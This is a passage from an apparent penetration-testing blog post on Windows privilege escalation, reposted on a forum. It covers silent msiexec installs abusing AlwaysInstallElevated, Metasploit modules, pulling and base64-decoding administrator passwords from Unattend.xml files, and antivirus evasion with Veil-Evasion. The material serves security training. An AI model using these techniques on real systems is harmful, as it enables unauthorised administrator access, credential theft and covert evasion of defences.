/i C:\Users\Steve.INFERNO\Downloads\rotten.msiThe properties of the switches utilized in the above Msiexec command are below: /quiet = Suppress any messages to the user during installation /qn = No GUI /i = Regular (vs. administrative) installation Once run, we can check to validate that our account was created and added to the Local Administrator Group: Note: MSI files created with MSFVenom as well as with the always_install_elevated module discussed below, will fail during installation. This behavior is intentional and meant to prevent the installation being registered with the operating system. Metasploit Module: exploit/windows/local/always_install_elevated As you can see below, this module simply requires that you link it to an existing session prior to running: There is an advanced setting, called QUIET, that you’ll want to enable in most scenarios. Turning on QUIET acts the same as utilizing the /quiet switch as part of a Msiexec command. This ensures that all messages to the user are suppressed, keeping our activities covert. The module creates an MSI file with a randomly-generated filename and takes care of all cleanup after deployment. Unattended Installs Unattended Installs allow for the deployment of Windows with little-to-no active involvement from an administrator. This solution is ideal in larger organizations where it would be too labor and time-intensive to perform wide-scale deployments manually. If administrators fail to clean up after this process, an EXtensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts, to include Administrator accounts! While it’s a good idea to search the entire drive, Unattend files are likely to be found within the following folders: C:\Windows\Panther\ C:\Windows\Panther\Unattend\ C:\Windows\System32\ C:\Windows\System32\sysprep\ Note: In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf files on the file system. These files can also contain credential information utilizing during deployment of the operating system, allowing us to escalate privileges. Once you’ve located an Unattend file, open it up and search for the <UserAccounts> tag. This section will define the settings for any local accounts (and sometimes even Domain accounts): <UserAccounts> <LocalAccounts> <LocalAccount> <Password> <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value> <PlainText>false</PlainText> </Password> <Description>Local Administrator</Description> <DisplayName>Administrator</DisplayName> <Group>Administrators</Group> <Name>Administrator</Name> </LocalAccount> </LocalAccounts> </UserAccounts> In the snippet of the sample Unattend file above, you can see a local account being created and added to the Administrators group. The administrator chose not to have the password stored in plaintext; however, it is merely obfuscated with Base64. As seen below, we can trivially decode it in Kali with the following: echo "UEBzc3dvcmQxMjMhUGFzc3dvcmQ=" | base64 -d So, our password is “P@ssword123!Password”? Not quite… Microsoft appends “Password” to all passwords within Unattend files before encoding them; therefore, our Local Administrator password is in fact just “P@ssword123!”. Note: Under the <UserAccounts> section, you may also see<AdministratorPassword> tags, which are another way to configure the Local Administrator account. Metasploit Module: post/windows/gather/enum_unattend This module is relatively straightforward. The only action is to assign it to the active Meterpreter session we are interested in: After a review of the source code, it appears that this module will only search for Unattend.xml files, and therefore, may miss stored credentials in related files such as syspref.xml and syspref.inf. On the positive side, this module will search the entire drive in an attempt to located Unattend files. Group Policy Preferences (GPP) Please refer to my August 2015 blog post for a detailed walkthrough of exploiting GPP for privilege escalation: What You Know Bout GPP???. !!! Important Note Regarding Anti-Virus !!! During my testing, MSI and EXE binaries generated by MSFVenom as well as Metasploit Modules were flagged by some Anti-Virus (a/v) software. This is because the executable templates utilized by Metasploit are well-known to a/v vendors. For more information on why templates are flagged and how to evade detection, please see my September 2015 blog post: A/V Ain’t Got Nothing On Me! Utilizing an obfuscation tool such as Veil-Evasion or creating your own executable by “compiling” PowerShell scripts (to add a user to the Administrators group, for example) stand a much better chance of bypassing any deployed a/v solution. Within Metasploit, modules offer an advanced option to substitute custom EXE and MSI binaries. Just be sure to set EXE::Custom or MSI::Custom to point to your binary prior to executing the module. Additional Resources Windows Privilege Escalation Fundamentals This is an amazing resource put together by Ruben Boonen (@FuzzySec) and was indispensable during my preparation for the Offensive Security Certified Professional exam. Ruben touches on escalation techniques not covered in my post, such as searching the registry for credentials as well as exploiting scheduled tasks. Most definitely worth the read… PowerUp PowerUp is a PowerShell tool written by Will Schroeder (@harmj0y) that will query a victim machine in order to identify what privilege escalation vectors are present. With most of the vectors, if the machine is vulnerable, you can then utilize PowerUp for exploitation. Originally written in 2014 as a standalone tool, it has now been integrated into Empire, a post-exploitation, cryptographically-secure PowerShell agent. Sursa: http://toshellandback.com/2015/11/24/ms-priv-esc/
×
×
  • Create New...